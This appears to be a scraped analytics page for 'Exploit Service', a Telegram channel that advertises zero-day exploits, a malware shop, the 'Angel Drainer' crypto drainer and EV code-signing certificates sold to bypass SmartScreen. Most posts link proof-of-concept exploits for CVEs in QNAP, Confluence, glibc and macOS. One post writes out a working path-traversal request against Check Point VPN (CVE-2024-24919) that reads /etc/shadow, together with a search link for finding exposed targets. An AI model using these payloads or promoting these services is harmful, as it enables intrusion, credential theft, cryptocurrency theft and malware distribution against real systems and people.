cookie

Ми використовуємо файли cookie для покращення вашого досвіду перегляду. Натиснувши «Прийняти все», ви погоджуєтеся на використання файлів cookie.

avatar

Exploit Service

Exploit Service | BlackHat ZERO DAY'S EXPLOITS Everything is published for informational purposes only. Private: @ExploitServiceBot Exploit Developers: @ExploitDevs All Projects: @MalwareLinks Escrow: @MalwareEscrow

Більше
Рекламні дописи
8 486
Підписники
+724 години
+2637 днів
+52330 днів

Триває завантаження даних...

Приріст підписників

Триває завантаження даних...

Фото недоступнеДивитись в Telegram
CVE-2024-24919 Check Point Remote Access VPN 0-Day https://en.fofa.info/result?qbase64=YXBwPSJDaGVja19Qb2ludC1TU0wtTmV0d29yay1FeHRlbmRlciI%3D POC: POST /clients/MyCRL HTTP/1.1 Host: <redacted> Content-Length: 39 aCSHELL/../../../../../../../etc/shadow Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport
Показати все...
RWX_MEMEORY_HUNT_AND_INJECTION_DV OneDrive.exe + API-интерфейс = шелл-код (без выделения новой области памяти RWX) https://github.com/Offensive-Panda/RWX_MEMEORY_HUNT_AND_INJECTION_DV Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport
Показати все...
GitHub - Offensive-Panda/RWX_MEMEORY_HUNT_AND_INJECTION_DV: Abusing Windows fork API and OneDrive.exe process to inject the malicious shellcode without allocating new RWX memory region.

Abusing Windows fork API and OneDrive.exe process to inject the malicious shellcode without allocating new RWX memory region. - Offensive-Panda/RWX_MEMEORY_HUNT_AND_INJECTION_DV

CVE-2024-27842 + CVE-2023-40404 macOS Sploit allows you to execute code at the kernel level POC exploit (для CVE-2024-27842) POC exploit (для CVE-2023-40404) Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport
Показати все...
CVE-2024-2961 - тихоходка 2 Переполнение буфера в glibc's iconv Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport
Показати все...
cve-2024-2961_cnext-exploits.zip0.08 KB
Фото недоступнеДивитись в Telegram
CVE-2024-2961 - тихоходка Помните месяц назад был кипишь, относительно того что нашли дырку в glibc. Тогда многие хостеры еще напряглись. Но так как в широкий паблик ничего не уплыло, все успокоились. А ресёрчеры не успокоились, слишком вкусно пахло перспективным сплоитом. Ну так вот, на сцену вползает Iconv со своим RCE. Сегодня вышел отличный WriteUp (первая часть из трёх), который раскрывает только часть потенциала дыры 2961 https://www.ambionics.io/blog/iconv-cve-2024-2961-p1 Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport
Показати все...
Фото недоступнеДивитись в Telegram
Linux Kernel Teaching. Laboratory Большой и годный сборник лекций и лабораторных работ по ядру Linux. Лекции посвящены теоретическому исследованию ядра Linux. Лабораторки сделаны в стиле инструкций. Будет полезно: админам, драйверописателям и руткитоварам https://linux-kernel-labs.github.io/refs/heads/master/index.html Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport
Показати все...
Фото недоступнеДивитись в Telegram
Finding, analyzing and exploiting stack buffer overflow in the netfilter subsystem from the softirq context. https://betrusted.it/blog/64-bytes-and-a-rop-chain-part-1/ https://betrusted.it/blog/64-bytes-and-a-rop-chain-part-2/ Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport
Показати все...
Фото недоступнеДивитись в Telegram
CVE-2024-21683 Confluence Data Center and Server RCE https://github.com/absholi7ly/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server/ Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport
Показати все...
Фото недоступнеДивитись в Telegram
👀Forget about SmartScreen👀 ⭐️[SALE 2500$ ONE-TIME 350$]⭐️ ✍️EV Code Signing ✍️ No Malware scan 🦠 Valid Sign✅ Remote Access 📡 No Smart Screen 📺 In stock - Pre-order🪤 Hot Topics🏖 https://forum.exploit.in/topic/239556 https://xss.is/threads/110863 Bot for orders🎯 https://t.me/D3Fuck_Loader_bot
Показати все...
CVE-2024-27130 RCE on a vulnerable QNAP device. https://github.com/watchtowrlabs/CVE-2024-27130 Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport
Показати все...
GitHub - watchtowrlabs/CVE-2024-27130: PoC for CVE-2024-27130

PoC for CVE-2024-27130. Contribute to watchtowrlabs/CVE-2024-27130 development by creating an account on GitHub.

Оберіть інший тариф

На вашому тарифі доступна аналітика тільки для 5 каналів. Щоб отримати більше — оберіть інший тариф.